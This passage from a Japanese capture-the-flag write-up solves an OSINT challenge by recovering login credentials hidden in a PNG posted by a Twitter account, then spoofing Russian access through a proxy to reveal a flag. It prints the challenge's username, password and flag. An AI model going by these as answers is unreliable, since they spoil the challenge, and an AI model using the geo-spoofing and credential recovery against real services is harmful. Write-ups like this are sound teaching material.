②のbasic認証が必要なURLについてヒントになりそうなものがなく、ここで詰まった。(セキュリティツールのhydra?現実的ではなさそうだ...)
色々調べていくと問題のTwitterアカウントがいいねしている内容で以下のものがあった。画像ファイルにzipを組み込む記事。
I found a way to stuff up to ~3MB of data inside a PNG file on twitter. This is even better than my previous JPEG ICC technique, since the inserted data is contiguous.
— David Buchanan (@David3141593) 2021年3月17日
The source code is available in the ZIP/PNG file attached: pic.twitter.com/zEOl2zJYRC
投稿している画像を確認すると1番最初の画像だけpngで後はjpeg形式。
対象のpng画像を確認するとUserとパスワードが記載された画像が末尾に付与されていた。
画像の情報は②サイトのURLに入力するアカウント/パスワードになる。
CHECK MY BIOはTwitterのJ.Sの記載が該当する。
②のサイトに得られたアカウントでログインすると以下の画面が表示される。
ユーザ名:J.S
パスワード:right_next_to_you
再度一時的にプロキシの設定を変更してロシアからのアクセスに偽装すると修正された部分のflagが見えた。
flag{=we_can_change_tomorrow=}
感想
・主催者様へ、素晴らしい大会を開催頂き有難うございました。
取り組みやすい問題が多く 非常に楽しかったです。
